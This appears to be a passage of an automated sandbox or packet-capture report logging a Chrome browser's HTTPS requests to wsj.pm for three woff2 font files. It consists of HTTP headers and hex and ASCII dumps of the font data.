                                                                                                                2024-04-25 14:58:18 UTC7160INData Raw: 36 b2 b1 56 19 fc 16 c4 b6 20 cf 05 2f 83 4f 35 82 4f 3e c9 43 a8 80 3e e6 8b 61 56 6b 2a 0a d7 2b 40 42 99 29 c2 fa 50 1a 1d 70 a8 18 2f ce c4 23 1a 4c cd e1 b7 3b 0a a3 31 10 e0 84 d7 2b 20 20 5e 0d ca d1 37 87 02 b4 5c 29 61 a4 4d 6e 75 a4 49 0d 5f 3d d0 02 f4 f1 86 43 af d9 22 b3 d3 d3 09 5a fe 17 e8 94 8a bb a2 6d 4a af b5 95 45 84 0a b0 cd d3 e2 a1 83 be 61 7b 8a 4f cf 8b 8a 78 31 11 bd 14 41 a6 bd cc 4e 14 3b 42 c9 41 f1 85 64 6a b7 bb 34 64 e1 f2 5b eb 2a 89 08 e2 6a 13 53 ad 0c ae 76 55 a1 e4 79 5a 6a 18 14 1e 12 ef 64 a1 8a 02 e1 05 e8 05 41 33 8a a9 a5 20 80 c5 51 9c 0f 6c a0 f8 ec e3 e5 83 bc 42 ae dc 57 72 83 be f4 ec 6c f6 9c 33 ac 4c 0a 56 67 a3 87 d9 ac 43 d8 11 9c 6c 42 6e 68 d6 d0 1e a9 9a 40 c8 b9 66 7c 3b 6b 50 a1 75 f0 b3 89 58 1e 4b
                                                                                                                Data Ascii: 6V /O5O>C>aVk*+@B)Pp/#L;1+ ^7\)aMnuI_=C"ZmJEa{Ox1AN;BAdj4d[*jSvUyZjdA3 QlBWrl3LVgClBnh@f|;kPuXK


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.1749719103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:17 UTC553OUTGET /fonts/woffs/retina/Retina-Light.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:17 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:28 GMT
                                                                                                                ETag: "b7e0-60eae3ba48500"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 47072
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:17 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 b7 e0 00 12 00 00 00 02 2e 80 00 00 b6 b6 00 01 00 00 00 00 b7 1c 00 00 00 c4 00 00 01 f0 00 00 00 00 00 00 00 00 19 3a 1a 81 62 1b 81 bd 2a 1c ad 5c 06 60 00 93 00 08 78 09 9a 16 11 08 0a 85 d8 2c 85 9f 55 01 36 02 24 03 97 6e 0b 8b 7a 00 04 20 05 8e 6e 07 b1 0c 0c 81 23 5b f1 0a 92 08 d9 c6 6e e3 51 0b df 8c b0 2a dd 64 00 f2 fe dc cc 74 59 a7 d7 c8 e4 56 7e e8 cd de a6 03 fd f1 7a a9 03 6c 9b 46 34 ac 37 4b a5 b1 f9 c9 3f 69 f6 ff ff ff ff ff ff ca 64 11 b6 39 3b 97 cc de 5d c8 4b 80 14 0b 58 88 3c 6a 2b 5a 1f 88 b9 7b 4c 36 66 54 29 a7 85 94 73 5d 21 a7 ac 5c 25 93 94 b2 49 4d 4c 68 b3 9b e8 b9 33 15 72 df 0f 2c 56 cb 7a 8c 76 15 e1 12 aa b8 66 1b 77 2a 51 29 b4 ae e8 c4 7a 08 6b a6 12 45 eb 1d ea 2a a1 5b 98 34 50 89 4a
                                                                                                                Data Ascii: wOF2.:b*\`x,U6$nz n#[nQ*dtYV~zlF47K?id9;]KX<j+Z{L6fT)s]!\%IMLh3r,Vzvfw*Q)zkE*[4PJ
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 6d 33 50 dc 72 57 5a 58 2d 41 37 1d db e8 5a 14 02 99 41 a6 1c f5 cc 15 8d ba 9e d8 d2 55 5f 5b b1 5b f0 01 3b 62 f3 da dd 4f 5e 70 2d c8 b0 97 6a 2d 2d 78 0f 47 26 a8 6d 60 35 cd 2d 81 3a c0 70 9c 5e ab d9 1e 7e 99 ff e2 85 25 0a ae c0 84 b7 2a 41 b1 36 b7 aa f5 f2 1a c4 48 84 57 b2 36 c3 be 7a 95 2f ad 98 69 fb 53 f6 53 df 14 db dd d3 74 8a 46 be 7b 8e 87 f2 75 04 cd e4 0d b5 e4 14 6d 90 d5 e3 ae b6 d1 37 aa db df a8 cd f2 51 aa 69 05 69 62 7a 17 0d cf 9f 34 6b 05 63 7e 49 d5 ae 26 0d cb 8f 18 9a 2b 2f 46 62 4c c9 ac 54 9c d5 c9 e1 a2 30 f4 d1 3c c1 ac 23 c4 1c 2e 6a 54 cf cc 12 f9 60 81 52 2a 16 9a 5a f6 d3 a4 de 83 e4 d1 5d 78 40 95 d2 74 01 45 57 9a 54 ac 8a d4 1e b5 c2 ac 2a 15 76 2a ba 50 3d db 0d 31 b4 d3 7f 25 49 fb 45 54 f7 7e c5 33 34 6e 98 27
                                                                                                                Data Ascii: m3PrWZX-A7ZAU_[[;bO^p-j--xG&m`5-:p^~%*A6HW6z/iSStF{um7Qiibz4kc~I&+/FbLT0<#.jT`R*Z]x@tEWT*v*P=1%IET~34n'
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: d3 e3 8e c3 04 06 73 8e 1c a7 c9 58 70 fb a6 9a 92 f9 ce ee 2f b4 35 69 a2 50 2d 46 bd 98 d5 22 e8 b1 d9 3d 33 8a 66 b9 8c 2d aa e5 b4 29 b9 28 95 24 b4 1e 4d ed c1 a1 4a 5d ee f2 e8 5c 12 1b 8c f8 ac 0d 36 03 29 d6 e1 0f d1 0c e4 4a 81 28 65 ea 2c c8 18 86 0c b3 f4 89 8f 9d 4c 36 c4 a5 99 b2 a7 b6 0a 7a 14 1d 91 21 45 f6 a1 73 6b 2f 3a cb 86 6c 33 7d 60 84 06 4b aa 66 91 33 3c 74 ef 9b e1 88 2a 10 f6 8d b9 d0 2a 4e c0 34 14 6d d1 5c 13 f3 40 21 04 83 5e 29 3f f5 cc 73 2a a4 41 c1 84 da 76 bf a9 cb 29 07 2d 47 4e c3 39 40 01 f4 51 74 70 61 6b 0a 36 0f f4 e4 14 0d a3 8e da b0 6c b7 ef b4 35 b0 59 a4 2e 1e 47 86 10 1c b6 00 56 23 d0 9a 10 66 b3 f9 8f 91 54 db 84 12 6d 34 15 0c d9 8b ac ed 30 fa b8 4d 81 20 6c b9 84 0c 95 b4 10 95 17 eb ab 42 8d a7 ff 33 10
                                                                                                                Data Ascii: sXp/5iP-F"=3f-)($MJ]\6)J(e,L6z!Esk/:l3}`Kf3<t**N4m\@!^)?s*Av)-GN9@Qtpak6l5Y.GV#fTm40M lB3
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: ef 26 e6 bb 29 58 0d 79 d4 6d 87 dc 20 c7 a0 e4 5b 2a 66 7b 84 c0 32 8d 4c f7 11 6c 0d 74 b1 3f 46 76 ea e8 29 68 8b 27 09 53 a2 8e 93 48 c7 a3 52 04 64 12 a5 33 18 3d 6f 83 67 40 42 b6 2d e9 22 03 04 d1 8e a8 ab 99 83 4a 7f 76 d0 25 cd 43 d8 e7 58 4c e9 b0 ed 55 2c 3c 75 8b 86 ab b9 8a 71 0a fc 78 bf f8 1a 8c 2c c5 8c 49 36 a5 a4 98 92 31 e6 e4 75 b1 94 58 ef fb 1c 7a c4 68 60 ff 8f 27 8f 4d d0 83 a1 94 26 e2 f7 7e d6 2d 6b 52 30 d0 f4 5c 28 d4 9f 0f 3e 39 fe 3a 20 70 2d 14 f4 55 1a 86 84 81 53 30 11 95 8c 15 d4 ed 7b cb 23 37 de f1 87 d1 c1 6d f2 ac c3 9f 15 97 f4 25 40 bc 44 85 f6 46 0d 1d f7 43 8a 01 8d 36 a6 a4 18 97 17 37 24 2f 8f 25 42 a1 c4 d8 c7 0b 00 14 24 b7 b8 a8 06 97 79 48 cd 55 5f c5 3e 1e e6 7b ea a7 d3 ee 31 c9 a6 fb 4f a5 38 f2 e8 e3 a6
                                                                                                                Data Ascii: &)Xym [*f{2Llt?Fv)h'SHRd3=og@B-"Jv%CXLU,<uqx,I61uXzh`'M&~-kR0\(>9: p-US0{#7m%@DFC67$/%B$yHU_>{1O8
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: b2 be 42 30 9e 8f 54 f2 a3 4e 49 96 d2 ec 30 24 5b f8 44 2b 17 a9 27 8e bc 01 17 3c 4b b8 65 30 11 8f 29 fd 1e ca c0 e4 f0 fe 77 59 38 07 11 a9 b7 2a 25 c8 7d 24 c1 26 63 88 54 3a 6e 4e 22 26 08 5f a0 e2 c6 61 66 b6 bc 06 23 90 7a d2 90 5d c3 de 2d 8b c1 ec 80 ab 2a bd b0 20 53 1b a2 10 9e e2 c2 5c 72 af 7e 88 e6 8e 99 7a 8f b7 4d da 03 62 3c 19 eb 63 d6 fc 12 ad fe 6c e4 dd 19 f2 9e a7 13 8c 68 ca 25 d7 32 d4 25 c5 3e 61 f8 8a d2 2d 3d 87 1f 58 c8 35 65 e6 2a 4d 22 61 80 d9 19 2e e1 72 9c 7c e9 fd fe c1 73 3f d6 81 d6 d0 e5 45 74 fb 96 bc 71 9c 0a f8 bc 7c df 20 5c 55 6b 08 8c 83 6a 8b 9a 64 bd 5d 0a b0 36 07 49 43 c2 1a 14 8e 74 d6 92 44 8e da 21 22 a5 c4 3e 24 f1 e7 ae 26 7d e1 22 4a c2 be 4c ae 12 7b 15 2e 9f 7b 82 16 75 b0 a8 28 d3 ae e6 56 88 13 75
                                                                                                                Data Ascii: B0TNI0$[D+'<Ke0)wY8*%}$&cT:nN"&_af#z]-* S\r~zMb<clh%2%>a-=X5e*M"a.r|s?Etq| \Ukjd]6ICtD!">$&}"JL{.{u(Vu
                                                                                                                2024-04-25 14:58:18 UTC7132INData Raw: 74 39 53 b7 ed 93 ee c6 ba c7 45 c6 e9 b9 e5 a6 b4 28 70 32 e4 86 a3 46 b6 9a d8 93 e0 05 b3 24 0e da 6c fd e7 9a 26 15 e0 e7 cc 8d d1 14 25 74 69 56 ea 12 0e 32 49 2c 58 56 e2 92 e4 57 e7 4a 14 d4 72 2f 2c 33 1c 29 af a5 a1 8b 8a ed 10 f5 a6 56 a0 93 25 dd c8 dc 36 81 80 95 84 15 6b 98 39 35 29 64 15 f6 91 aa ed 82 39 a2 ce 5d 0b 5e c3 45 2f 52 fc af 0d 4c 79 5c 9d 23 0f de 75 02 6f af 90 11 69 40 2f 0b 4f 95 e7 8b 55 ad fb 55 d0 33 e6 c9 b5 c3 8b 32 e8 80 43 a9 d3 6f 57 3c e3 c1 10 98 94 3c 9c 8e aa 10 22 cc fb 15 71 c0 ef a4 28 10 3f 49 6c 78 59 29 db 98 2a 6e 6d 64 49 9d 59 3b a6 c9 63 ba 3c 92 78 9d 83 bc ce 88 0b d4 c2 ff 80 26 71 71 4f f4 98 e2 f8 52 75 1b a1 0a 16 d0 c6 f3 91 c6 c5 23 41 99 cb cf 8d a5 df 44 fa 5a 4a 27 97 46 eb 9d 18 56 84 92 43
                                                                                                                Data Ascii: t9SE(p2F$l&%tiV2I,XVWJr/,3)V%6k95)d9]^E/RLy\#uoi@/OUU32CoW<<"q(?IlxY)*nmdIY;c<x&qqORu#ADZJ'FVC


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.1749722103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:17 UTC554OUTGET /fonts/woffs/retina/Retina-Medium.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:18 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:33 GMT
                                                                                                                ETag: "b9c0-60eae3bf0d040"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 47552
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:18 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 b9 c0 00 12 00 00 00 02 32 80 00 00 b8 95 00 01 00 00 00 00 b8 fc 00 00 00 c4 00 00 01 f0 00 00 00 00 00 00 00 00 19 3a 1a 81 62 1b 81 bd 48 1c ad 5c 06 60 00 93 00 08 78 09 9a 16 11 08 0a 85 e0 04 85 a7 65 01 36 02 24 03 97 6e 0b 8b 7a 00 04 20 05 8e 7a 07 b1 0c 0c 81 23 5b 2b 0f 92 08 55 e3 6e 2f fd a3 89 32 06 74 93 01 dc 33 73 3e 7f 57 95 fe 80 38 6e 4f 02 9d c7 96 7b 52 a3 6c 7c 97 b0 6d 1a d4 bb 5b 25 b9 a0 65 66 f6 ff ff ff ff ff ff b2 64 11 63 6b 66 0f 66 f7 00 00 55 54 c3 50 51 b5 af fa ff 20 38 47 78 16 e7 0a 72 ca 21 45 e4 ba a9 5a d5 a8 9b 4e c8 81 5e c3 aa 6a 86 75 bb 81 da 15 0b cd d6 4d 6f 5b 04 8f d8 ed 0d a7 83 21 fb a8 f4 6c af df 64 a8 c1 24 0d 38 d9 39 e1 dd 54 81 83 b9 9a 85 73 c7 11 8e 4e 14 a5 b9 64 b3
                                                                                                                Data Ascii: wOF22:bH\`xe6$nz z#[+Un/2t3s>W8nO{Rl|m[%efdckffUTPQ 8Gxr!EZN^juMo[!ld$89TsNd
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: d6 71 6e 07 51 4b f2 50 cd 6a 0f c1 a5 0e d1 c3 16 1d 5e 8f 73 c2 54 5b ea 24 f3 07 73 ac 57 54 f7 5a b8 fa 59 9e e5 56 1d b0 48 ab cc 04 b5 f7 88 8f 94 b1 dc 6e 6f bb 90 ee 7d 4a bc 4e 11 a8 94 3d c9 e2 b0 bb 29 57 b5 d5 0f 66 3e a2 51 e0 38 e5 b1 b0 66 2d c9 72 b7 45 d2 c8 4a 01 4f 53 b5 6d 4d f3 cd 50 ea 24 f0 6a 51 2b 00 4e 50 38 d1 80 89 4e 68 33 41 cd d6 54 9b 92 ce 51 87 3d b7 8e 72 fb a4 04 34 d5 94 8f 1d aa fd 57 a4 4d 9a 41 ed 4b 54 7b 28 90 51 29 e2 02 15 da d5 05 28 e6 3b 41 35 b0 40 75 9f 42 9c 68 59 6d 64 3e 3f d8 52 a4 46 4d 45 bd 8e 64 64 72 0e 77 95 cd 32 48 98 07 13 5f 15 9d 92 d0 b4 90 8a 89 98 43 09 e0 d6 17 1a 9d 68 9a 31 70 dd 35 51 55 75 79 92 4c d1 a4 01 77 33 f8 d0 9b ea 9e 3a eb b5 a5 de d7 bc cf 6d dc a8 4e fd 7a bd 37 63 bc ac
                                                                                                                Data Ascii: qnQKPj^sT[$sWTZYVHno}JN=)Wf>Q8f-rEJOSmMP$jQ+NP8Nh3ATQ=r4WMAKT{(Q)(;A5@uBhYmd>?RFMEddrw2H_Ch1p5QUuyLw3:mNz7c
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: b8 b1 34 2f 9c 80 72 14 e3 9e 4d 53 79 bc b5 b9 a1 d5 4b bf 04 69 ac 37 c4 9d 43 e9 8b 8e 68 45 3a 64 72 75 05 c0 1e f0 2d 34 06 4b b5 e4 62 a7 34 89 26 ef 29 d6 ec 3f 8f b4 f6 1e 36 37 01 e7 d2 dc 84 84 f3 cb 80 b5 ff 99 e2 ec b8 c8 6a f7 db 96 c6 ff 00 95 e1 23 ad 96 02 5b 7d 24 e8 87 3b 7c d0 76 d8 03 8d 7d 8e 1c 17 c8 0a aa 83 be fa d4 f4 d1 58 82 73 cd 31 62 0b 24 41 af 46 b3 9a f5 2a a8 13 cf fb 25 8e 7f 75 c5 a1 08 f9 c8 43 ce 4d 71 c3 ac 61 27 bb 36 67 90 8b d8 90 70 ae b0 e7 1c da d7 25 c5 3c f1 9b 9a fa 3f 1a f5 1e 41 0b 2d 03 a2 93 21 97 32 39 83 05 62 05 f6 8f 8e 3e 7c 89 bd 34 aa c6 08 50 7b 7e 73 53 72 b0 aa d6 96 3e c3 a9 26 19 31 71 73 52 ac 1b 0b 3d 35 8c 93 b5 49 b4 55 47 62 23 de 75 dc 49 08 cd 18 4c d4 04 01 84 d1 14 7d c5 99 49 5c 8b
                                                                                                                Data Ascii: 4/rMSyKi7ChE:dru-4Kb4&)?67j#[}$;|v}Xs1b$AF*%uCMqa'6gp%<?A-!29b>|4P{~sSr>&1qsR=5IUGb#uIL}I\
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: f1 ff 20 1e 93 c8 51 a6 a7 d4 fc ba 22 a0 8a 17 cb 41 f5 3b 2c 56 f9 24 6c 0f 86 df fa 7f e4 23 e4 8b fa 52 a9 04 9c ae cc a2 38 1d 51 6c 22 b8 f8 48 6b 71 2b ce 73 bd bb b6 1b 77 ec d2 4c ad 29 ab 16 97 77 69 63 ad de 56 0b df 00 7e 22 72 6a 19 3c b9 e9 ea a3 4c a3 3e 32 60 e2 30 02 88 68 73 03 11 c9 97 0b 52 5e 69 0a 1a 73 0b 1a 63 f8 57 8e c7 c6 27 47 95 92 c3 8f 95 8b b9 a9 32 71 2c 3f 87 9b c4 ae 0b 61 1e ea 8c d9 13 01 ba f7 fe 15 76 40 30 73 c1 4d de 83 0d b9 f7 9b b7 4c da 37 2a 0c 12 c6 34 ca f0 bf 0a 71 91 27 4a 8a 4a 00 54 06 23 e9 44 89 b3 24 46 14 3f 1f 17 37 1f 0f 66 51 f7 60 92 c3 8d 80 e9 8a c2 93 39 a4 4d 41 fb ff e7 08 bb 7a 04 8c 5b 3e 33 02 5a f1 2f df f1 f3 85 0b 78 ce b7 78 fc fb 19 48 dc 89 af 02 00 65 61 88 30 6a 4c 52 0c 8e 11 43
                                                                                                                Data Ascii: Q"A;,V$l#R8Ql"Hkq+swL)wicV~"rj<L>2`0hsR^iscW'G2q,?av@0sML7*4q'JJT#D$F?7fQ`9MAz[>3Z/xxHea0jLRC
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 5a da 96 f0 44 bb 62 26 56 35 d2 5b ac 2c 0b b7 71 ba 08 bc 5b 8f cb f4 16 3d f7 ff 7d 25 a3 46 ad 12 30 99 f3 da 16 30 9c fe 53 0f 17 24 fe 88 10 c4 66 9b 08 9f e9 97 e5 28 4f 01 46 18 6d d7 06 68 51 d5 5c 22 08 a1 75 40 15 19 40 d7 e4 cd e8 a1 2e 1f fd 6a 1b 85 e7 af d8 75 62 7d 69 f1 65 b9 27 1b 04 dc c2 fb f5 b9 46 dd a1 47 be b3 4c b7 03 6f f3 51 3c 25 68 96 2c ca c4 65 fb 26 5f 9b 1a a5 f0 c0 07 f9 38 f1 b8 8b 49 dc fc ae 9e e4 4e 62 82 96 7c 47 d8 dd a1 9b fc 7e 8a 82 5c f2 0b 06 c9 6d 8d e4 b4 e5 62 1e 30 92 9c af 7a 65 91 ae ae 9a 99 7d 28 43 92 cd 24 1b 72 ff 7b 93 92 ab 02 d6 96 47 de 60 d1 48 48 4e 82 60 48 63 57 7a c6 b7 9d 4e 99 97 59 d4 70 cb 16 e9 6d a9 0c 79 d5 3b 13 9e 6e f3 5b 3b 81 dc 92 73 bc 96 84 cf 51 71 ea 61 66 91 b8 f5 13 a5 91
                                                                                                                Data Ascii: ZDb&V5[,q[=}%F00S$f(OFmhQ\"u@@.jub}ie'FGLoQ<%h,e&_8INb|G~\mb0ze}(C$r{G`HHN`HcWzNYpmy;n[;sQqaf
                                                                                                                2024-04-25 14:58:18 UTC7612INData Raw: 4e c0 25 ca 39 92 fd 9f 19 20 c1 a2 e3 46 34 88 1f 61 bd 39 7c 64 23 d7 dc 11 48 12 c3 1c a2 8f 24 1d 1a 41 4f c5 bc 2e 20 75 86 e0 1e 24 34 62 19 8f 34 f5 45 75 0c 4c 72 16 1b ce 17 49 3b 8a 95 9a 9e 3d 9a b9 23 88 ea 03 89 0c f7 c6 14 0f 5b 4d 70 9f dd 9c f4 77 3f c7 0f 90 59 08 0d 3c 67 14 a1 fe 40 4b ca 13 81 1c f2 ee 57 78 9e 40 dc eb 62 39 3c 1c e9 4a 49 4b 31 2e dd 8d be 8f 8b 94 67 11 e8 0e ab 51 90 74 2b 41 73 59 13 21 82 e4 b4 e4 c4 1c 3c b2 d8 02 12 37 72 9a 34 42 8f 06 79 2d 74 3c 49 36 ec 54 3a b5 52 3e da d8 6e fa 34 61 8a 8d 9c 02 aa 45 71 ff ab 4c 48 19 64 20 b2 88 47 6a 6d 68 ef 8e 01 fe 69 57 a8 4d 9d 56 35 3a 90 1d 08 b1 92 44 95 e7 56 26 e3 04 ef ef f6 85 b6 f2 cc e6 67 ff f5 f4 a5 99 88 f0 1f 82 22 2a 96 1e 9c b7 08 9c 07 84 75 13 23
                                                                                                                Data Ascii: N%9 F4a9|d#H$AO. u$4b4EuLrI;=#[Mpw?Y<g@KWx@b9<JIK1.gQt+AsY!<7r4By-t<I6T:R>n4aEqLHd GjmhiWMV5:DV&g"*u#


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.1749723103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:17 UTC557OUTGET /fonts/woffs/retina/RetinaNarr-Light.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:18 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:17 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:47 GMT
                                                                                                                ETag: "b730-60eae3cc66fc0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 46896
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:18 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 b7 30 00 12 00 00 00 02 2b 60 00 00 b6 06 00 01 00 00 00 00 b6 6c 00 00 00 c4 00 00 01 f0 00 00 00 00 00 00 00 00 19 3a 1a 81 62 1b 81 bd 3c 1c ad 5c 06 60 00 93 00 08 78 09 9a 16 11 08 0a 85 d1 30 85 97 7d 01 36 02 24 03 97 6e 0b 8b 7a 00 04 20 05 8f 3c 07 b1 0c 0c 81 23 5b 79 07 92 0e 9f 3e 87 f7 2a f7 5b 82 00 82 6d d3 39 b6 95 00 c8 01 55 ab c2 57 b0 5d 2f e8 3c ea d4 d1 66 41 bc 03 6c 5c 3d b3 db 61 d4 ff ac 1c 65 ff ff ff ff ff ff ff ff b6 64 21 6b 36 b3 81 d9 24 20 af 5a 7c 8a f5 69 a9 b6 de 79 07 b9 11 53 4a 9c 11 ab 58 23 f2 aa 69 39 06 b9 d5 b9 dd 9b c3 40 cd e8 58 6b c3 5b bc d5 a6 64 4a a6 64 4a 85 4c bc ab 78 5f 8c 17 7e 38 5a ef ee c8 a2 bc 47 9c 85 53 24 a7 1e 3e e9 e3 2d e5 73 26 a7 78 89 c3 a0 39 66 a8 72 ab
                                                                                                                Data Ascii: wOF20+`l:b<\`x0}6$nz <#[y>*[m9UW]/<fAl\=aed!k6$ Z|iySJX#i9@Xk[dJdJLx_~8ZGS$>-s&x9fr
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 9d a7 6d 43 8b ce c9 24 65 01 93 a1 00 ad 60 4c af 26 42 d9 f6 ea f6 eb b1 0f ba d1 b4 a7 47 7b d4 5b c3 73 6c 83 c1 0b 31 9d d8 53 c6 94 36 5d 6d 4b 00 40 f2 08 a6 13 76 14 34 14 b7 03 82 4a b8 7d d0 fc 82 1f 3b d2 20 79 77 91 6a b0 5d f6 5d a6 2f d3 d8 71 10 98 46 79 66 66 68 1b db 75 43 b6 34 16 74 8e a3 50 71 8f be 76 65 87 1f 6c e2 15 c1 56 a0 28 5a e2 55 29 3e 66 61 ad 5b 5d 41 8a 2d 1a 12 3f e3 3a c4 62 67 d4 9f 7f 2f 20 47 0b 27 d4 a8 4d b4 6f 65 ca 96 1c 1a ea 3c 99 11 11 29 26 a3 45 72 5a 1f 17 18 31 c7 2a 00 70 8b b0 61 ad db 63 ec 15 6d 8d 2a 09 ed f4 f9 6b 34 2c fe eb ff da af b6 79 56 fe d7 43 dd e0 a9 63 5b cc 96 75 65 e5 29 f1 2b c9 7a d6 d2 46 dd a4 b1 77 7d 59 e8 cf cc 43 5f 5c 6a d9 b6 d1 ca 8e 9e 14 9a 6b d9 53 e3 06 d6 6b 9e b5 1d cb
                                                                                                                Data Ascii: mC$e`L&BG{[sl1S6]mK@v4J}; ywj]]/qFyffhuC4tPqvelV(ZU)>fa[]A-?:bg/ G'Moe<)&ErZ1*pacm*k4,yVCc[ue)+zFw}YC_\jkSk
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 54 16 d7 8e 7d cc 9b 4d 49 9c 3a 4f a9 b3 eb 4e 79 7a bc bf a7 cc 11 55 eb 40 6f 2d 3a b0 11 dc f7 3d 5c 00 11 9c cc 18 c2 09 10 59 b2 9c 23 6d 1a 81 92 e6 9a a8 5a 76 6a 94 d1 39 1a a1 5c 82 6a 09 cb 53 a0 be 69 96 4d 09 82 a9 36 6f 8f 6a 09 eb 7a 6c e5 dc ce a8 b5 01 d6 8a d4 d1 55 f4 01 59 83 16 74 03 ef 34 a0 eb b0 19 78 b5 44 6f 23 bc 9d 0a 68 db 1f 84 8a 86 48 9d 53 86 32 d1 d0 67 d1 15 ce d6 a4 6a 1d 6f 4d 4a bc 71 43 e7 12 c3 cf b1 4b 83 41 d1 49 32 e7 ac 5b e7 04 b3 5b 1b 1e 0c cb bd 49 87 d5 b3 a6 31 61 2b 7e f5 4e 32 e2 0c 6e 66 26 5f e0 bb 95 48 c5 ac 89 6b 59 1b 69 07 c6 07 35 9d c5 66 b6 59 bb 31 a8 d1 83 c0 24 23 b7 ef bd 8d 60 e4 d6 1d 10 01 e4 47 9f 88 8b 93 2f 0d 08 67 34 0d c3 b6 8f 50 8c 87 af 65 83 bd 19 f4 1c b6 75 00 86 43 05 7b 6b
                                                                                                                Data Ascii: T}MI:ONyzU@o-:=\Y#mZvj9\jSiM6ojzlUYt4xDo#hHS2gjoMJqCKAI2[[I1a+~N2nf&_HkYi5fY1$#`G/g4PeuC{k
